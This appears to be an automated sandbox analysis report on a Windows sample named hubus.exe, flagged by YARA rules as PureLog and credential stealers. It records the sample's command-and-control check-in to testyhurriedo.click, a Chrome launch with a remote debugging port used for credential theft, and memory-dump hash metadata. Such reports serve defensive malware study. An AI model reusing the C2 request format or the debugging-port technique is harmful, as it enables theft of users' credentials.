                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k%2Fr00Kkmq8mUU0LhgVh7d1rllB6NculUJM5ClskhWr4NI2pZBVMEH8611Va40Uu%2FmqPXsKkt7gypj6sZDoU4Ty%2B42h38ILDH%2FRItczp4lgpS2kyDK5EbH5%2F7qL1IZa5DAUmI7X%2Bm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f4b57899dfa4575-ATL
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=141288&min_rtt=141195&rtt_var=29932&sent=500&recv=845&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1070403&delivery_rate=27063&cwnd=252&unsent_bytes=0&cid=561ed71efaff46a7&ts=2564&x=0"


Session ID:14
Source IP:192.168.11.20
Source Port:49766
Destination IP:104.21.112.1
Destination Port:443
PID:4780
Process:C:\Users\user\Desktop\hubus.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-19 23:58:42 UTC  267  OUT  POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 83
                                                                                                                                                                                                                                                            Host: testyhurriedo.click
2024-12-19 23:58:42 UTC  83  OUT  Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 26 6a 3d 26 68 77 69 64 3d 41 34 33 33 31 41 38 42 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33
                                                                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=jMw1IE--SHELLS&j=&hwid=A4331A8BB129FD4CDB71E32F12885CB3
2024-12-19 23:58:42 UTC  1131  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=t10fhsh58ld219d0ju3qbfhhv3; expires=Mon, 14 Apr 2025 17:45:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cI%2F%2FiUWQDOyU72xs1CUBBSO%2Fz3RXmCTesY5WBMQAEevcFON6r0ElS2yPBP9gKjrhdip32U16duvjHFP9hxE4BAvuBciNIaB7GsSWeLEJKBMwDP6J5%2FCK2FafBR3VnXRVSjwEphQI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f4b579c68a632ec-JAX
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=135432&min_rtt=135212&rtt_var=28869&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=986&delivery_rate=28175&cwnd=252&unsent_bytes=0&cid=a3c50f656ca59428&ts=565&x=0"
2024-12-19 23:58:42 UTC  146  IN  Data Raw: 38 63 0d 0a 30 4a 62 71 68 30 5a 41 31 74 39 6d 68 58 38 32 4a 32 32 33 4d 76 6e 63 68 39 6c 54 46 77 44 4f 4b 73 35 65 36 63 34 61 36 36 75 4c 37 63 6a 79 5a 48 72 30 74 78 4c 78 44 30 55 64 4d 5a 68 75 31 72 66 72 73 43 4e 30 59 62 70 50 76 6a 65 63 2f 6a 53 59 77 37 2f 6d 74 71 67 76 4c 71 4b 41 42 65 6b 50 61 55 73 4a 78 57 32 4b 74 4f 62 33 4a 32 39 30 37 41 62 73 4f 4a 33 73 49 4e 6d 48 38 76 50 49 76 58 63 39 69 77 3d 3d 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 8c0Jbqh0ZA1t9mhX82J223Mvnch9lTFwDOKs5e6c4a66uL7cjyZHr0txLxD0UdMZhu1rfrsCN0YbpPvjec/jSYw7/mtqgvLqKABekPaUsJxW2KtOb3J2907AbsOJ3sINmH8vPIvXc9iw==
2024-12-19 23:58:42 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                                            Start time:18:58:00
                                                                                                                                                                                                                                                            Start date:19/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\hubus.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\hubus.exe"
                                                                                                                                                                                                                                                            Imagebase:0xa70000
                                                                                                                                                                                                                                                            File size:1'361'408 bytes
                                                                                                                                                                                                                                                            MD5 hash:43F8E85B16887DF9AEE3D896BD1FD7E3
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.11852643145.0000000000A72000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.12089048630.0000000005C90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.12074166269.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                                            Start time:18:58:22
                                                                                                                                                                                                                                                            Start date:19/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\hubus.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\hubus.exe"
                                                                                                                                                                                                                                                            Imagebase:0xe20000
                                                                                                                                                                                                                                                            File size:1'361'408 bytes
                                                                                                                                                                                                                                                            MD5 hash:43F8E85B16887DF9AEE3D896BD1FD7E3
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                                            Start time:18:58:25
                                                                                                                                                                                                                                                            Start date:19/12/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                                                                                                                                                                            Imagebase:0x7ff6ad3d0000
                                                                                                                                                                                                                                                            File size:2'742'376 bytes
                                                                                                                                                                                                                                                            MD5 hash:BB7C48CDDDE076E7EB44022520F40F77
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                                            Start time:18:58:26
                                                                                                                                                                                                                                                            Start date:19/12/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2720,i,2268975299143198714,4336465224231573627,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2744 /prefetch:3
                                                                                                                                                                                                                                                            Imagebase:0x7ff6ad3d0000
                                                                                                                                                                                                                                                            File size:2'742'376 bytes
                                                                                                                                                                                                                                                            MD5 hash:BB7C48CDDDE076E7EB44022520F40F77
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true


                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:10.6%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                              Signature Coverage:13.4%
                                                                                                                                                                                                                                                              Total number of Nodes:67
                                                                                                                                                                                                                                                              Total number of Limit Nodes:2

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r$<Z;@$TJBr$Te=r$pAr$r)xI$xb@r
                                                                                                                                                                                                                                                              • API String ID: 0-2331095733
                                                                                                                                                                                                                                                              • Opcode ID: 02340045bdbbbafcdea5713b1062f1a81303ed8bf9fc2c73819ddfca88ca477c
                                                                                                                                                                                                                                                              • Instruction ID: d24bbec2d9a1b87747b60002532a03b65823e4c23ba8d70ae7cf8a26768e84d8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02340045bdbbbafcdea5713b1062f1a81303ed8bf9fc2c73819ddfca88ca477c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7522775A105249FDB15DFA8C984FA9BBB2FF48304F1581A8E50AAB362CB35EC51CF50

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: TJBr$Te=r$`*#o$pAr$xb@r
                                                                                                                                                                                                                                                              • API String ID: 0-2592614037
                                                                                                                                                                                                                                                              • Opcode ID: 0e2f03866ddb61b3c6eb15ac426636a432b851c9fdcbd5f2d4aa6e845321b45e
                                                                                                                                                                                                                                                              • Instruction ID: dbbcf511565018af9af57d615482f7b284c684cee2d1334c1cd7d1fb795f1cff
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e2f03866ddb61b3c6eb15ac426636a432b851c9fdcbd5f2d4aa6e845321b45e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCA2A575A00628CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB361DB319E81CF40

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 2$$=r
                                                                                                                                                                                                                                                              • API String ID: 0-3892478113
                                                                                                                                                                                                                                                              • Opcode ID: 6830c1466fe9307bab7779f05555c43ce8bdbf88e2783f8e0e2484a8a4344491
                                                                                                                                                                                                                                                              • Instruction ID: 389b876436f75cdbaf6d0963a4604494b9b930236f58b57e45d45c060ab8a8fd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6830c1466fe9307bab7779f05555c43ce8bdbf88e2783f8e0e2484a8a4344491
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57E2E874E016188FDB65DF68E884B9ABBF2FB89302F1081D9D849A7354DB349E85CF50
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: (Ar
                                                                                                                                                                                                                                                              • API String ID: 0-793193261
                                                                                                                                                                                                                                                              • Opcode ID: c96c3bb350b5b98b2944d5c3882225950c4fd29d93fc0fc68584022560ce683a
                                                                                                                                                                                                                                                              • Instruction ID: 8b8fbff0d9de49ee2331bfb1b591336d1b1509750322bbe2f60af0e22a0068d8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c96c3bb350b5b98b2944d5c3882225950c4fd29d93fc0fc68584022560ce683a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD427A75B006069FCB19DB69C494B6EFBF2FF88300F148529D56AD7381DB38A906CB90
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: PH=r
                                                                                                                                                                                                                                                              • API String ID: 0-1076057192
                                                                                                                                                                                                                                                              • Opcode ID: 80df32021041c14cbc5295f1f0593d991c0f3fd982e6d057b7bccf2fec49b05a
                                                                                                                                                                                                                                                              • Instruction ID: ac4ae614a4d0b7c49102bd901710c95df33607c0b88026e6a6f7d74d34584c85
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80df32021041c14cbc5295f1f0593d991c0f3fd982e6d057b7bccf2fec49b05a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26D10475E05218CFEB14CF69E888BAEBBF2FB49305F1080A9D489AB654CB745D85CF11
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: PH=r
                                                                                                                                                                                                                                                              • API String ID: 0-1076057192
                                                                                                                                                                                                                                                              • Opcode ID: ab622b2a56c32c57e018432a64163eabdd48f0be9173ec3d476cccbff3aaea8b
                                                                                                                                                                                                                                                              • Instruction ID: d0021664032bca48c2bec39203f11cbdf24281c18c20db2c53eb3d8fcfaa1abd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab622b2a56c32c57e018432a64163eabdd48f0be9173ec3d476cccbff3aaea8b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DD10474E05218CFDB14CF69E888BAEBBF2FB49301F5080A9D489AB654CB745D85CF11
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: Te=r
                                                                                                                                                                                                                                                              • API String ID: 0-4292089484
                                                                                                                                                                                                                                                              • Opcode ID: 3a446f9967d4ae0d25bf33b400010901a36de1004ab6cdd262e96d0ff2c52f42
                                                                                                                                                                                                                                                              • Instruction ID: a207f54741075bb6bfa6cbbbf17297dd60e522c872c27d67cd9bedc097ee148f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a446f9967d4ae0d25bf33b400010901a36de1004ab6cdd262e96d0ff2c52f42
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9A1F374E04218CFDB14DFA9D888BADBBFAFB49300F249469E409A7251DB709D85CF10
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: Te=r
                                                                                                                                                                                                                                                              • API String ID: 0-4292089484
                                                                                                                                                                                                                                                              • Opcode ID: 560693c9b8a46cc3c63293936bcee07238feafc83bb2a3ef5ce4f2e686e82931
                                                                                                                                                                                                                                                              • Instruction ID: 05d499405a882ff26315cd347da4effe8d28fd896c2ea0e632ddfdf06fcf908e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 560693c9b8a46cc3c63293936bcee07238feafc83bb2a3ef5ce4f2e686e82931
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35A1E274E05218CFDB14DFA9D988BADBBF6FB49304F2484A9E409A7251EB709D85CF10
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4|Br
                                                                                                                                                                                                                                                              • API String ID: 0-2141330505
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: +
                                                                                                                                                                                                                                                              • API String ID: 0-2126386893

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: (Ar$(Ar$(Ar$(Ar$(Ar
                                                                                                                                                                                                                                                              • API String ID: 0-4191292406
                                                                                                                                                                                                                                                              • Opcode ID: 1368c1ca5407eb5916195e9e1cd7837aba5399bb3b874f4204a92a8fad351b25
                                                                                                                                                                                                                                                              • Instruction ID: 828f2a2f59b71650879b226cea6ed675d2a75a155ff2d65d5c033e52f8434f34
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1368c1ca5407eb5916195e9e1cd7837aba5399bb3b874f4204a92a8fad351b25
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CDB1F1323106168FDB19DB68D954B6E7BE2EF85319F14846AE905CB395CB34EC02C7A1

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: (_=r$(_=r$(_=r$(_=r
                                                                                                                                                                                                                                                              • API String ID: 0-2219016859
                                                                                                                                                                                                                                                              • Opcode ID: d1c86cb6abf9e8ce29f7b05c8c9c98ad8068703273b2a6dc02c629d22f5af175
                                                                                                                                                                                                                                                              • Instruction ID: 22e3ff312960eee260fd7b6a2b0995218ca04ca3d346cb090a1b7e0cd9ade4cd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1c86cb6abf9e8ce29f7b05c8c9c98ad8068703273b2a6dc02c629d22f5af175
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1161AE76F042058FDB04DF78C865A6E7BB2EF89314B588569D9029B3A1DB31DC46CF90

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: HAr$HAr$HAr
                                                                                                                                                                                                                                                              • API String ID: 0-3039488707
                                                                                                                                                                                                                                                              • Opcode ID: 1675f541253b70936c296224a5d6d7372f4e83fbe8d457101fb52f468d870866
                                                                                                                                                                                                                                                              • Instruction ID: d5557b3f43dff45f91fcbed1eecacc912086e2a5b2bda182194650b51ea16330
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1675f541253b70936c296224a5d6d7372f4e83fbe8d457101fb52f468d870866
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F123A31A00205DFCB25EFA9C894A6EBBF6FF88305B14856DD4569B390DB35EC49CB90

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r$4'=r$4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-1785461895
                                                                                                                                                                                                                                                              • Opcode ID: c028a3f38123fb72b8ce2b99182e1efb2d3f31c24019740dc3a5df1c8d7ce97e
                                                                                                                                                                                                                                                              • Instruction ID: 035a81c740e99b64d6b38496104a91dddc679acc80859d318df74cf57b75378b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c028a3f38123fb72b8ce2b99182e1efb2d3f31c24019740dc3a5df1c8d7ce97e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24F1D634A10119DFCB14EFA4D998EADBBB2FF88300F118159E506AB3A5DB75EC46CB50

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: (Ar$(Ar$HAr
                                                                                                                                                                                                                                                              • API String ID: 0-2497560704
                                                                                                                                                                                                                                                              • Opcode ID: 4c055fe01afa642af4db2c8d711c35a233c6b37128650dd9efd41ddd2ebfd3f1
                                                                                                                                                                                                                                                              • Instruction ID: 083023fdf69ce9b2b020a3ff0af91d0bc2afe9b470ef63b8913cd39cd7d676a1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c055fe01afa642af4db2c8d711c35a233c6b37128650dd9efd41ddd2ebfd3f1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7E11D35B00609DFCB05EFA4D5949AEBBB2FF89300F108569E816AB364DB74EC45CB91

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12074051424.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2ee0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r$4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-1271949470
                                                                                                                                                                                                                                                              • Opcode ID: ef80f14a57b2c5919bc9c0ad8d1e46567864be97611cf4ef67013bb90644863d
                                                                                                                                                                                                                                                              • Instruction ID: d428ad2edda5e0b23170f56b0f1fa416aa811eb410e86109126939904607acb3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ef80f14a57b2c5919bc9c0ad8d1e46567864be97611cf4ef67013bb90644863d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CF1C174E45218DFCF18DFA8E5886ADBBB2FF89305F20942AE416A7390DB355985CF10
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: @$}
                                                                                                                                                                                                                                                              • API String ID: 0-1351071989
